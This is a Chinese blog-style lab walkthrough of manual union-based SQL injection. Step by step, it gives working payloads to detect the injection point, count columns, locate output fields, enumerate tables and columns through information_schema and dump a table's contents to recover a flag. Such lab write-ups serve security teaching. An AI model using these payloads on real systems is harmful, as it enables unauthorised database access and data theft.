一次简单的纯手工显错注入

# 注入的两个条件:1.用户可以控制传参,2.用户输入的语句被带入数据库进行查询

**注:这里还要利用到了一个函数group_concat( ),意思是将查询的结果并排 拼接一起展示,不然输出点只能显示一个表名或者字段

1.利用and1=1 显示正常, and 1=2 显示错误页面。证明有注入点
2。order by 语句查询有几个字段,为了后面使用联合查询
例如,order by 4 出错,order by 3 显示正确,判断为3个字段
一次简单的纯手工显错注入一次简单的纯手工显错注入
3.使用union 联合查询 显错点,输出点
语句:
and 1=2 union select 1,2,3
一次简单的纯手工显错注入一次简单的纯手工显错注入
显错点为2,3
4.查询当前库名
语句:
and 1=2 union select 1,database(),3
一次简单的纯手工显错注入一次简单的纯手工显错注入
当前库名为security
5。查表名,利用当前库名查系统表
语句:
and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=“security”
一次简单的纯手工显错注入一次简单的纯手工显错注入
这里利用到了一个函数group_concat( ),意思是将查询的结果并排 拼接一起展示
不然输出点只能显示一个表名
6。查字段,利用表名查系统表
语句:
and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=“zkaq”
一次简单的纯手工显错注入一次简单的纯手工显错注入
7.查表内的信息
语句:
and 1=2 union select 1,group_concat(flag),group_concat(zKaQ) from zkaq
一次简单的纯手工显错注入一次简单的纯手工显错注入
我们想要的表内的所有信息如图展示

我们也得到了我们需要的信息:flag为:zKaQ-ErR0rBaS4d,
一次简单的手工注入成功